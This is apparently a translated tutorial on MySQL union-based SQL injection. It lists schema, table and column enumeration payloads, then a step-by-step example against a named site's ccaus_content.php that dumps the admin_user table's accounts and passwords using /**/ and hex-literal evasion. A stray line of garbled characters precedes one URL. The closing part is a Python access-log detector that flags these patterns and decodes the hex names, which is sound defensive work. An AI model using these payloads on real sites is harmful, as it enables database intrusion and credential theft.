Enumerating databases (schemas)

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerating tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<database name as hex>/**/limit/**/1,1

Enumerating columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<table name as hex>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

Example:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping through the limit offset this way, the admin_user table shows up at the 4th result.

2. Dump columns
( u3 D$ [) V. a, `* O) L# E% mhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
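The payloads above rely on two evasions: `/**/` in place of whitespace and `0x...` hex literals in place of quoted strings. The following detector is an added example (not part of the original post) that undoes both on access-log request lines, flags the `union select` / `information_schema` pattern, and decodes the hex literals back into the schema and table names being enumerated; the sample requests are constructed, the second and third mirroring the post's own payloads.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not from a real log); the second and
# third reuse the post's payloads, the third additionally URL-encoded.
SAMPLE_REQUESTS = [
    "GET /ccaus_content.php?ccausid=13240 HTTP/1.1",
    "GET /ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/"
    "1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/"
    "TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* HTTP/1.1",
    "GET /ccaus_content.php?ccausid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F"
    "1,COLUMN_NAME,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.COLUMNS%2F%2A%2A%2F"
    "where%2F%2A%2A%2FTABLE_NAME=0x61646D696E5F75736572 HTTP/1.1",
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

def normalize(query: str) -> str:
    """Undo URL-encoding (one extra pass for double-encoding) and turn
    inline comments back into whitespace so keyword matching works."""
    decoded = query
    for _ in range(2):
        decoded = unquote_plus(decoded)
    spaced = SQL_COMMENT.sub(" ", decoded)      # "/**/" -> " ", "/*x*/" -> " "
    return re.sub(r"\s+", " ", spaced).lower()

def decode_hex_literals(query: str) -> list[str]:
    """Recover the identifiers hidden in 0x... literals (e.g. a schema name)."""
    out = []
    for h in HEX_LITERAL.findall(query):
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            out.append("<non-ascii:0x%s>" % h)
    return out

def analyze_request(line: str) -> dict:
    """Classify one 'METHOD path HTTP/x' line and return the indicators found."""
    parts = line.split(" ")
    path = parts[1] if len(parts) > 1 else line
    query = path.partition("?")[2]
    norm = normalize(query)
    indicators = []
    if re.search(r"\bunion\b.*\bselect\b", norm):
        indicators.append("union_select")
    if "information_schema." in norm:
        indicators.append("schema_enumeration")
    if "/**/" in unquote_plus(query):
        indicators.append("comment_obfuscation")
    return {"suspicious": bool(indicators), "indicators": indicators,
            "decoded_hex": decode_hex_literals(norm)}

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(analyze_request(req))
```

The decoded hex tells the analyst which schema (yd_teamnet) and table (admin_user) were being targeted, which is what to check first when scoping the incident.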